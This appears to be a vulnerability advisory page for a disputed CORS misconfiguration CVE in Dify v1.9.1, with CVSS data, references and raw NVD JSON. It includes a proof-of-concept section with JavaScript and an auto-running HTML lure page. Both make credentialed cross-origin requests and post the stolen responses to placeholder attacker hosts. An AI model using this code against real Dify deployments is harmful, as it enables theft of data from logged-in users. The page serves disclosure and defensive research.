Security Vulnerability Report
CVE-2025-63388 CVSS 9.1 CRITICAL

CVE-2025-63388

Published: 2025-12-18 16:15:55
Last Modified: 2026-01-28 17:16:08

Description

A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/system-features endpoint. The endpoint implements an overly permissive CORS policy that reflects arbitrary Origin headers and sets Access-Control-Allow-Credentials: true, allowing any external domain to make authenticated cross-origin requests. NOTE: the Supplier disputes this, providing the rationale of "sending requests with credentials does not provide any additional access compared to unauthenticated requests."

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:langgenius:dify:1.9.1:*:*:*:*:node.js:*:* - VULNERABLE
Dify v1.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-63388 PoC - CORS Misconfiguration in Dify v1.9.1
// Target: /console/api/system-features endpoint
const targetUrl = 'https://TARGET_DIFY_INSTANCE/console/api/system-features';

async function exploitCORS() {
  try {
    // Create XMLHttpRequest with credentials
    const xhr = new XMLHttpRequest();
    xhr.open('GET', targetUrl, true);
    xhr.withCredentials = true;
    xhr.onreadystatechange = function() {
      if (xhr.readyState === 4) {
        if (xhr.status === 200) {
          console.log('[+] Success! Received response:');
          console.log(xhr.responseText);
          // Extract sensitive data
          const data = JSON.parse(xhr.responseText);
          console.log('[+] System Features:', JSON.stringify(data, null, 2));
          // Send data to attacker server
          fetch('https://ATTACKER_SERVER/log', {
            method: 'POST',
            body: JSON.stringify({ cve: 'CVE-2025-63388', data: data })
          });
        } else {
          console.log('[-] Request failed with status:', xhr.status);
        }
      }
    };
    xhr.send();
  } catch (error) {
    console.error('[-] Error:', error.message);
  }
}

// Execute when page loads
exploitCORS();

// HTML page for social engineering:
const htmlPage = `
<!DOCTYPE html>
<html>
<head><title>Loading...</title></head>
<body>
<script>
// Auto-execute the CORS attack
fetch('TARGET_URL/console/api/system-features', { credentials: 'include' })
  .then(r => r.json())
  .then(data => {
    // Exfiltrate data
    fetch('https://attacker.com/exfil', { method: 'POST', body: JSON.stringify(data) });
  });
</script>
</body>
</html>
`;

References

https://gist.github.com/Cristliu/5ded6d03e41d7d66ecb1b568bae3ff6c (Third Party Advisory)
https://gist.github.com/Cristliu/c2bc7d05abd89db8eb542a453a528d77
https://github.com/langgenius/dify/discussions (Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63388", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:54.650", "lastModified": "2026-01-28T17:16:07.980", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/system-features endpoint. The endpoint implements an overly permissive CORS policy that reflects arbitrary Origin headers and sets Access-Control-Allow-Credentials: true, allowing any external domain to make authenticated cross-origin requests. NOTE: the Supplier disputes this, providing the rationale of \"sending requests with credentials does not provide any additional access compared to unauthenticated requests.\""}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langgenius:dify:1.9.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "ABF9FC69-C390-446E-830C-5F8B0A0488F2"}]}]}], "references": [{"url": "https://gist.github.com/Cristliu/5ded6d03e41d7d66ecb1b568bae3ff6c", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gist.github.com/Cristliu/c2bc7d05abd89db8eb542a453a528d77", "source": "[email protected]"}, {"url": "https://github.com/langgenius/dify/discussions", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}